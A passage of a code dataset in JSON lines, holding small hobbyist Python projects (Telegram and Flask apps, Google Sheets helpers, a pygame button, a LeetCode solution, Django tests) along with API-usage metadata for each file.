"django.shortcuts.get_object_or_404", "line_number": 23, "usage_type": "call"}, {"api_name": "taggit.models.Tag", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.core.paginator.Paginator", "line_number": 25, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 29, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 37, "usage_type": "argument"}, {"api_name": "forms.ComentarioForm", "line_number": 46, "usage_type": "call"}, {"api_name": "forms.ComentarioForm", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Post.publicados.filter", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Post.publicados", "line_number": 54, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 66, "usage_type": "argument"}, {"api_name": "forms.EmailPostForm", "line_number": 70, "usage_type": "call"}, {"api_name": "django.core.mail.send_mail", "line_number": 77, "usage_type": "call"}, {"api_name": "forms.EmailPostForm", "line_number": 80, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "forms.BuscarForm", "line_number": 85, "usage_type": "call"}, {"api_name": "forms.BuscarForm", "line_number": 89, "usage_type": "call"}, {"api_name": "django.contrib.postgres.search.SearchVector", "line_number": 92, "usage_type": "call"}, {"api_name": "django.contrib.postgres.search.SearchQuery", "line_number": 93, "usage_type": "call"}, {"api_name": "models.Post.objectos.annotate", "line_number": 94, "usage_type": "call"}, {"api_name": "models.Post.objectos", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 94, "usage_type": "name"}, {"api_name": "django.contrib.postgres.search.TrigramSimilarity", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "27182219945", "text": "import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\ns=['https://www.googleapis.com/auth/spreadsheets',\n'https://www.googleapis.com/auth/drive']\n\ncreds= ServiceAccountCredentials.from_json_keyfile_name(\"credentials.json\",s)\nclient=gspread.authorize(creds)\n\nsheet = client.open(\"Reminders\").sheet1\nrow_values=sheet.row_values(1)\ncol_values=sheet.col_values(1)\nrow_filled=len(col_values)\ncol_filled=len(row_values)\n\n \ndef save_reminder_date(date):\n\n sheet.update_cell(row_filled+1, 1, date)\n print(\"saved date!\")\n return 0\n \ndef save_reminder_body(msg):\n\n sheet.update_cell(row_filled+1, 2, msg)\n print(\"saved reminder message!\")\n return 0\n\n\n", "repo_name": "poojitagarg/whatsapp-chatbot", "sub_path": "whatsapp-bot/gsheet_func.py", "file_name": "gsheet_func.py", "file_ext": "py", "file_size_in_byte": 694, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 7, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 7, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "36354138184", "text": "import sqlite3\n\nfrom aiogram import types, Dispatcher\nfrom aiogram.utils.deep_linking import _create_link\n\nfrom config import bot\nfrom database.sql_commands import Database\nfrom keyboards.inline_buttoons import start_keyboard\n\n\nasync def start_button(message: types.Message):\n print(message)\n print(message.get_full_command())\n command = message.get_full_command()\n if command[1] != \"\":\n link = await _create_link(link_type=\"start\", payload=command[1])\n owner = Database().sql_select_user_by_link_query(\n link=link\n )\n if owner[0][\"telegram_id\"] == message.from_user.id:\n await bot.send_message(\n chat_id=message.from_user.id,\n text=\"You can not use own referral link\"\n )\n return\n print(f\"owner: {owner}\")\n try:\n Database().sql_insert_referral_query(\n owner=owner[0]['telegram_id'],\n referral=message.from_user.id\n )\n except sqlite3.IntegrityError:\n pass\n\n try:\n Database().sql_insert_user_query(\n telegram_id=message.from_user.id,\n username=message.from_user.username,\n first_name=message.from_user.first_name,\n last_name=message.from_user.last_name,\n )\n except sqlite3.IntegrityError:\n pass\n\n await bot.send_message(\n chat_id=message.chat.id,\n text=\"Hello, my dear!\",\n reply_markup=await start_keyboard()\n )\n\n\ndef register_start_handlers(dp: Dispatcher):\n dp.register_message_handler(start_button, commands=['start'])", "repo_name": "Ebulda/new_one", "sub_path": "handlers/start.py", "file_name": "start.py", "file_ext": "py", "file_size_in_byte": 1618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "aiogram.types.Message", "line_number": 11, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 11, "usage_type": "name"}, {"api_name": "aiogram.utils.deep_linking._create_link", "line_number": 16, "usage_type": "call"}, {"api_name": "database.sql_commands.Database", "line_number": 17, "usage_type": "call"}, {"api_name": "config.bot.send_message", "line_number": 21, "usage_type": "call"}, {"api_name": "config.bot", "line_number": 21, "usage_type": "name"}, {"api_name": "database.sql_commands.Database", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlite3.IntegrityError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "database.sql_commands.Database", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlite3.IntegrityError", "line_number": 42, "usage_type": "attribute"}, {"api_name": "config.bot.send_message", "line_number": 45, "usage_type": "call"}, {"api_name": "config.bot", "line_number": 45, "usage_type": "name"}, {"api_name": "keyboards.inline_buttoons.start_keyboard", "line_number": 48, "usage_type": "call"}, {"api_name": "aiogram.Dispatcher", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "14558735810", "text": "import hashlib\nfrom typing import Optional\n\nimport r128gain\n\n\ndef get_gain_level(filepath) -> Optional[float]:\n \"\"\"\n Takes a path to a file and calculates the gain level for the file using some external library.\n :param filepath: The file to get the gain level for\n :return: Either the gain level for the file or None, if it couldn't be determined\n \"\"\"\n try:\n gain_info = r128gain.get_r128_loudness([filepath])\n if isinstance(gain_info[0], float):\n return gain_info[0]\n else:\n return None\n except:\n return None\n\n\ndef get_sha1_hash(filepath) -> Optional[str]:\n \"\"\"\n Reads a file and returns its SHA1 hash as a hex string\n :param filepath: The file to hash\n :return: The hash as a hex string or None if some error occured\n \"\"\"\n block_size = 2 ** 18 # 256kB\n sha1 = hashlib.sha1()\n\n try:\n with open(filepath, 'rb') as file_handle:\n while True:\n data = file_handle.read(block_size)\n if not data:\n break\n sha1.update(data)\n return sha1.hexdigest()\n except:\n return None\n", "repo_name": "drdummsprech/sip-puff-jukebox", "sub_path": "scanner/Scan.py", "file_name": "Scan.py", "file_ext": "py", "file_size_in_byte": 1160, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "r128gain.get_r128_loudness", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 7, "usage_type": "name"}, {"api_name": "hashlib.sha1", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "15108127965", "text": "import pathlib\nimport zlib\nimport pickle\nimport pickletools\nimport base64\nimport sys\nimport contextlib\n\nsave_file = './library.bin'\n\nclass Resource:\n\n \"\"\"Manager for resources that would normally be held externally.\"\"\"\n\n WIDTH = 76\n __CACHE = None\n DATA = b''''''\n\n @classmethod\n def package(cls, *paths):\n \"\"\"Creates a resource string to be copied into the class.\"\"\"\n cls.__generate_data(paths, {})\n\n @classmethod\n def add(cls, *paths):\n \"\"\"Include paths in the pre-generated DATA block up above.\"\"\"\n cls.__preload()\n cls.__generate_data(paths, cls.__CACHE.copy())\n\n @classmethod\n def __generate_data(cls, paths, buffer):\n \"\"\"Load paths into buffer and output DATA code for the class.\"\"\"\n for path in map(pathlib.Path, paths):\n if not path.is_file():\n raise ValueError('{!r} is not a file'.format(path))\n key = path.name\n if key in buffer:\n raise KeyError('{!r} has already been included'.format(key))\n with path.open('rb') as file:\n buffer[key] = file.read()\n pickled = pickle.dumps(buffer, pickle.HIGHEST_PROTOCOL)\n optimized = pickletools.optimize(pickled)\n compressed = zlib.compress(optimized, zlib.Z_BEST_COMPRESSION)\n encoded = base64.b85encode(compressed)\n cls.__print(\" DATA = b'''\")\n for offset in range(0, len(encoded), cls.WIDTH):\n cls.__print(\"\\\\\\n\" + encoded[\n slice(offset, offset + cls.WIDTH)].decode('ascii'))\n cls.__print(\"'''\")\n\n @staticmethod\n def __print(line):\n \"\"\"Provides alternative printing interface for simplicity.\"\"\"\n with open(save_file, 'a') as f:\n f.write(line)\n f.flush()\n sys.stdout.write(line)\n sys.stdout.flush()\n\n @classmethod\n @contextlib.contextmanager\n def load(cls, name, delete=True):\n \"\"\"Dynamically loads resources and makes them usable while needed.\"\"\"\n cls.__preload()\n if name not in cls.__CACHE:\n raise KeyError('{!r} cannot be found'.format(name))\n path = pathlib.Path(name)\n with path.open('wb') as file:\n file.write(cls.__CACHE[name])\n yield path\n if delete:\n path.unlink()\n\n @classmethod\n def __preload(cls):\n \"\"\"Warm up the cache if it does not exist in a ready state yet.\"\"\"\n if cls.__CACHE is None:\n decoded = base64.b85decode(cls.DATA)\n decompressed = zlib.decompress(decoded)\n cls.__CACHE = pickle.loads(decompressed)\n\n def __init__(self):\n \"\"\"Creates an error explaining class was used improperly.\"\"\"\n raise NotImplementedError('class was not designed for instantiation')\n\nif __name__ == '__main__':\n Resource.package('libcheckers.so')", "repo_name": "Veldrovive/checkers", "sub_path": "c_checkers/library_builder.py", "file_name": "library_builder.py", "file_ext": "py", "file_size_in_byte": 2860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pickle.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pickletools.optimize", "line_number": 42, "usage_type": "call"}, {"api_name": "zlib.compress", "line_number": 43, "usage_type": "call"}, {"api_name": "zlib.Z_BEST_COMPRESSION", "line_number": 43, "usage_type": "attribute"}, {"api_name": "base64.b85encode", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 67, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 61, "usage_type": "attribute"}, {"api_name": "base64.b85decode", "line_number": 78, "usage_type": "call"}, {"api_name": "zlib.decompress", "line_number": 79, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "32755555721", "text": "import pygame as pg\nfrom src.settings import FONT, FONT_SIZE, COLOURS\n\nclass Button:\n def __init__(self, x, y, w, h, text=''):\n self.rect = pg.Rect(x, y, w, h)\n self.surf = pg.Surface((w, h))\n self.text = text\n\n def update_rect(self, new):\n x = new['x'] if 'x' in new else self.rect.left\n y = new['y'] if 'y' in new else self.rect.top\n w = new['w'] if 'w' in new else self.rect.width\n h = new['h'] if 'h' in new else self.rect.height\n self.rect = pg.Rect(x, y, w, h)\n self.surf = pg.Surface((w, h))\n\n def render(self, screen):\n FONT.render(self.surf, self.text, self.rect.width/2, self.rect.height/2, COLOURS['fc'], FONT_SIZE, style='center')\n screen.blit(self.surf, self.rect)\n \n def hover(self, c_idle, c_hover):\n if self.rect.collidepoint(pg.mouse.get_pos()):\n self.surf.fill(c_hover)\n else:\n self.surf.fill(c_idle)\n \n def click(self, cb, events):\n # check if button is clicked\n # call the cb function\n if self.rect.collidepoint(pg.mouse.get_pos()):\n for event in events:\n if event.type == pg.MOUSEBUTTONDOWN:\n cb()\n return True\n return False\n", "repo_name": "HuMangoPP/py_tasks", "sub_path": "src/components/button.py", "file_name": "button.py", "file_ext": "py", "file_size_in_byte": 1272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.Rect", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 16, "usage_type": "call"}, {"api_name": "src.settings.FONT.render", "line_number": 19, "usage_type": "call"}, {"api_name": "src.settings.FONT_SIZE", "line_number": 19, "usage_type": "argument"}, {"api_name": "src.settings.FONT", "line_number": 19, "usage_type": "name"}, {"api_name": "src.settings.COLOURS", "line_number": 19, "usage_type": "name"}, {"api_name": "pygame.mouse.get_pos", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "32174155260", "text": "from django.urls import path\nfrom .views import home,InboxView,ThreadView\n\napp_name = 'chat_app'\n\nurlpatterns = [\n path('',home,name='home'),\n path('thread//',ThreadView.as_view(),name='threads'),\n path('inbox/',InboxView.as_view(),name='inbox'),\n]\n", "repo_name": "NKrChauhan/chat-room", "sub_path": "chat_room/chatApp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 268, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.home", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.ThreadView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "views.ThreadView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.InboxView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.InboxView", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "178388730", "text": "import os\r\n\r\nfrom cs50 import SQL\r\nfrom flask import Flask, flash, jsonify, redirect, render_template, request, session\r\n\r\n# Configure application\r\napp = Flask(__name__)\r\n\r\n# Ensure templates are auto-reloaded\r\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\r\n\r\n# Configure CS50 Library to use SQLite database\r\ndb = SQL(\"sqlite:///birthdays.db\")\r\n\r\nmonth_length = 12\r\nday_length = 31\r\n\r\n\r\n@app.after_request\r\ndef after_request(response):\r\n \"\"\"Ensure responses aren't cached\"\"\"\r\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\r\n response.headers[\"Expires\"] = 0\r\n response.headers[\"Pragma\"] = \"no-cache\"\r\n return response\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n\r\n if request.method == \"POST\":\r\n # TODO: Add the user's entry into the database\r\n # Saves user's input\r\n name = request.form.get(\"name\")\r\n month = request.form.get(\"month\")\r\n day = request.form.get(\"day\")\r\n\r\n try:\r\n month_int = int(month)\r\n day_int = int(day)\r\n except ValueError:\r\n return redirect(\"/\")\r\n\r\n # Checks for wrong forms\r\n if not name or month_int > month_length or not month or day_int > day_length or not day:\r\n return redirect(\"/\")\r\n\r\n # INSERTS user's input into database\r\n db.execute(\"INSERT INTO birthdays (name, month, day) VALUES ((?), (?) , (?))\", name, month, day)\r\n return redirect(\"/\")\r\n\r\n else:\r\n\r\n # TODO: Display the entries in the database on index.html\r\n # Saves the entries in the database on a variable\r\n birthdays = db.execute(\"SELECT * FROM birthdays\")\r\n # Render template with database entries\r\n return render_template(\"index.html\", birthdays=birthdays)\r\n\r\n\r\n@app.route(\"/delete\", methods=[\"GET\", \"POST\"])\r\ndef delete():\r\n if request.method == \"POST\":\r\n id = request.form.get(\"id\")\r\n db.execute(\"DELETE FROM birthdays WHERE id = ?\", id)\r\n return redirect(\"/\")\r\n return redirect(\"/\")\r\n\r\n\r\n@app.route(\"/edit\", methods=[\"GET\", \"POST\"])\r\ndef edit():\r\n if request.method == \"POST\":\r\n id = request.form.get(\"id\")\r\n entry = db.execute(\"SELECT * FROM birthdays WHERE id = ?\", id)\r\n return render_template(\"edit.html\", entry=entry[0])\r\n\r\n return redirect(\"/\")\r\n\r\n@app.route(\"/editconfirm\", methods=[\"GET\", \"POST\"])\r\ndef editconfirm():\r\n if request.method == \"POST\":\r\n id = request.form.get(\"id\")\r\n name = request.form.get(\"name\")\r\n month = request.form.get(\"month\")\r\n day = request.form.get(\"day\")\r\n\r\n try:\r\n month_int = int(month)\r\n day_int = int(day)\r\n except ValueError:\r\n return redirect(\"/edit\")\r\n\r\n # Checks for wrong forms\r\n if not name or month_int > month_length or not month or day_int > day_length or not day:\r\n return redirect(\"/edit\")\r\n\r\n db.execute(\"UPDATE birthdays SET name = ?, month = ?, day = ? WHERE id = ?\", name, month, day, id,)\r\n return redirect(\"/\")\r\n\r\n return redirect(\"/\")\r\n\r\n", "repo_name": "YOLOCHAN1991/CS50-PSETs", "sub_path": "Week 9/birthdays/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "cs50.SQL", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "37282220288", "text": "#\n# @lc app=leetcode id=1340 lang=python3\n#\n# [1340] Jump Game V\n#\n# https://leetcode.com/problems/jump-game-v/description/\n#\n# algorithms\n# Hard (58.24%)\n# Likes: 263\n# Dislikes: 13\n# Total Accepted: 9.8K\n# Total Submissions: 16.8K\n# Testcase Example: '[6,4,14,6,8,13,9,7,10,6,12]\\n2'\n#\n# Given an array of integers arr and an integer d. In one step you can jump\n# from index i to index:\n# \n# \n# i + x where: i + x < arr.length and 0 < x <= d.\n# i - x where: i - x >= 0 and 0 < x <= d.\n# \n# \n# In addition, you can only jump from index i to index j if arr[i] > arr[j] and\n# arr[i] > arr[k] for all indices k between i and j (More formally min(i, j) <\n# k < max(i, j)).\n# \n# You can choose any index of the array and start jumping. Return the maximum\n# number of indices you can visit.\n# \n# Notice that you can not jump outside of the array at any time.\n# \n# \n# Example 1:\n# \n# \n# Input: arr = [6,4,14,6,8,13,9,7,10,6,12], d = 2\n# Output: 4\n# Explanation: You can start at index 10. You can jump 10 --> 8 --> 6 --> 7 as\n# shown.\n# Note that if you start at index 6 you can only jump to index 7. You cannot\n# jump to index 5 because 13 > 9. You cannot jump to index 4 because index 5 is\n# between index 4 and 6 and 13 > 9.\n# Similarly You cannot jump from index 3 to index 2 or index 1.\n# \n# \n# Example 2:\n# \n# \n# Input: arr = [3,3,3,3,3], d = 3\n# Output: 1\n# Explanation: You can start at any index. You always cannot jump to any\n# index.\n# \n# \n# Example 3:\n# \n# \n# Input: arr = [7,6,5,4,3,2,1], d = 1\n# Output: 7\n# Explanation: Start at index 0. You can visit all the indicies. \n# \n# \n# Example 4:\n# \n# \n# Input: arr = [7,1,7,1,7,1], d = 2\n# Output: 2\n# \n# \n# Example 5:\n# \n# \n# Input: arr = [66], d = 1\n# Output: 1\n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= arr.length <= 1000\n# 1 <= arr[i] <= 10^5\n# 1 <= d <= arr.length\n# \n#\n\n# @lc code=start\nfrom functools import lru_cache\nfrom collections import defaultdict\n\nclass Solution:\n def maxJumps(self, arr: List[int], d: int) -> int:\n # Time complexity: O(n x d)\n # Space complexity: O(n)\n # def dp(i):\n # if res[i]: \n # return res[i]\n # res[i] = 1\n # for di in (-1, 1):\n # for j in range(i + di, i + d * di + di, di):\n # if not (0 <= j < n and arr[j] < arr[i]):\n # break\n # res[i] = max(res[i], dp(j) + 1)\n # return res[i]\n\n # n = len(arr)\n # res = [0] * n\n # return max(map(dp, range(n)))\n\n\n # We can only jump lower, and one step needs the result from its lower step. \n # So we sort A[i] do the dp starting from the smallest.\n # For each A[i], we check the lower step on the left and right.\n # This process is O(D) on both side.\n # Time complexity: O(n x log(n) + n x d)\n # Space complexity: O(n)\n n = len(arr)\n dp = [1] * n\n for a, i in sorted([a, i] for i, a in enumerate(arr)):\n for di in (-1, 1):\n for j in range(i + di, i + d * di + di, di):\n if not (0 <= j < n and arr[j] < arr[i]):\n break\n dp[i] = max(dp[i], dp[j] + 1)\n return max(dp)\n\n\n # O(n)\n\n # n = len(arr)\n # dp = [1] * (n + 1)\n # stack = []\n # for i, a in enumerate(arr + [float(\"inf\")]):\n # while stack and arr[stack[-1]] < a:\n # L = [stack.pop()]\n # while stack and arr[stack[-1]] == arr[L[0]]:\n # L.append(stack.pop())\n\n # for j in L:\n # if i - j <= d:\n # dp[i] = max(dp[i], dp[j] + 1)\n # if stack and j - stack[-1] <= d:\n # dp[stack[-1]] = max(dp[stack[-1]], dp[j] + 1)\n\n # stack.append(i)\n\n # return max(dp[:-1])\n\n\n\n def jump(iterator):\n stack = []\n for i in iterator:\n while stack and arr[stack[-1]] < arr[i]:\n j = stack.pop()\n if abs(i - j) <= d:\n graph[j].append(i)\n stack.append(i)\n\n n = len(arr)\n graph = defaultdict(list)\n\n jump(range(n))\n jump(reversed(range(n)))\n\n @lru_cache(None)\n def height(i):\n return 1 + max(map(height, graph[i]), default=0)\n\n return max(map(height, range(n)))\n \n# @lc code=end\n\n", "repo_name": "chenxu0602/LeetCode", "sub_path": "1340.jump-game-v.py", "file_name": "1340.jump-game-v.py", "file_ext": "py", "file_size_in_byte": 4482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 162, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 167, "usage_type": "call"}]} +{"seq_id": "6018362503", "text": "from unittest.mock import patch\n\nfrom django.test import override_settings\n\nfrom app.test import TestCase, mixer\nfrom todolists import tasks\n\n\n@override_settings(\n ENABLE_NOTIFICATIONS=True,\n EMAIL_ENABLED=True,\n CELERY_ALWAYS_EAGER=True,\n)\nclass TestSendingEmailAboutInvitationAndExcludingFromTodolist(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.caller = mixer.blend('auth.User')\n cls.callee = mixer.blend('auth.User')\n cls.todolist = mixer.blend('todolists.TodoList')\n\n @patch('accounts.models.Profile.send_email_about_invitation_to_todolist')\n def test_sending_invitation(self, send_invite):\n tasks.send_email_about_invitation_to_todolist(self.caller.id, self.callee.id, self.todolist.id)\n\n assert send_invite.call_count == 1\n assert send_invite.call_args[0] == (self.caller, self.todolist)\n\n @patch('accounts.models.Profile.send_email_about_excluding_from_todolist')\n def test_sending_excludation(self, send_exclude):\n tasks.send_email_about_excludation_from_todolist(self.caller.id, self.callee.id, self.todolist.id)\n\n assert send_exclude.call_count == 1\n assert send_exclude.call_args[0] == (self.caller, self.todolist)\n", "repo_name": "temirlanKabylbekov/todoapp", "sub_path": "src/todolists/tests/unit/tests_tasks.py", "file_name": "tests_tasks.py", "file_ext": "py", "file_size_in_byte": 1228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "app.test.TestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "app.test.mixer.blend", "line_number": 18, "usage_type": "call"}, {"api_name": "app.test.mixer", "line_number": 18, "usage_type": "name"}, {"api_name": "app.test.mixer.blend", "line_number": 19, "usage_type": "call"}, {"api_name": "app.test.mixer", "line_number": 19, "usage_type": "name"}, {"api_name": "app.test.mixer.blend", "line_number": 20, "usage_type": "call"}, {"api_name": "app.test.mixer", "line_number": 20, "usage_type": "name"}, {"api_name": "todolists.tasks.send_email_about_invitation_to_todolist", "line_number": 24, "usage_type": "call"}, {"api_name": "todolists.tasks", "line_number": 24, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 22, "usage_type": "call"}, {"api_name": "todolists.tasks.send_email_about_excludation_from_todolist", "line_number": 31, "usage_type": "call"}, {"api_name": "todolists.tasks", "line_number": 31, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 29, "usage_type": "call"}, {"api_name": "django.test.override_settings", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "936379617", "text": "import re\nimport copy\n\nfrom bson.objectid import ObjectId\nfrom flask import request, json, jsonify, render_template\nfrom flask import Flask\n\n\nimport pymongo\nfrom pymongo.errors import *\n\nfrom models import *\n\napp=Flask(__name__, static_url_path='')\n\n\n@app.errorhandler(DuplicateKeyError)\ndef duperror(error):\n print(error.details)\n return error.details['errmsg'].split('classes.$')[1], 409\n\n@app.errorhandler(MyValidationError)\ndef valerror(error):\n print(error.message)\n return jsonify(error.to_dict()), 406\n\n\n@app.route('/')\ndef about():\n return render_template('about.html')\n\n@app.route('/classes/', methods=['GET', 'PUT', 'DELETE'])\ndef get_class(class_code):\n if request.method == 'GET':\n cl = classes.find_one({'code':class_code})\n cl = {i:j for i, j in cl.items() if i!=\"_id\"}\n return jsonify(cl)\n elif request.method == 'PUT':\n class_data = request.get_json(force=True)\n print(class_data)\n if 'code' in class_data.keys():\n raise MyValidationError(\"code couldn't be changed\")\n classes.update_one({'code':class_code}, {'$set':class_data})\n return 'Updated', 202\n elif request.method =='DELETE':\n classes.delete_one({'code':class_code})\n return 'Deleted', 202\n\n@app.route('/classes', methods=['GET', 'POST'])\ndef post_class():\n if request.method == 'POST':\n class_data = request.get_json(force=True)\n is_valid = class_validator(class_data)\n if is_valid:\n class_id = classes.insert_one(class_data).inserted_id\n return 'Created', 201\n if request.method == 'GET':\n if request.args:\n if 'student' in request.args.keys():\n n_args = dict(request.args)\n n_args['students'] = n_args['student']\n n_args.pop('student')\n n_args = {i:j[0] for i, j in n_args.items()}\n else:\n n_args = request.args\n print(n_args)\n result = classes.find(n_args)\n else: result = classes.find()\n res=[]\n for r in result:\n r['_id'] = str(r['_id'])\n 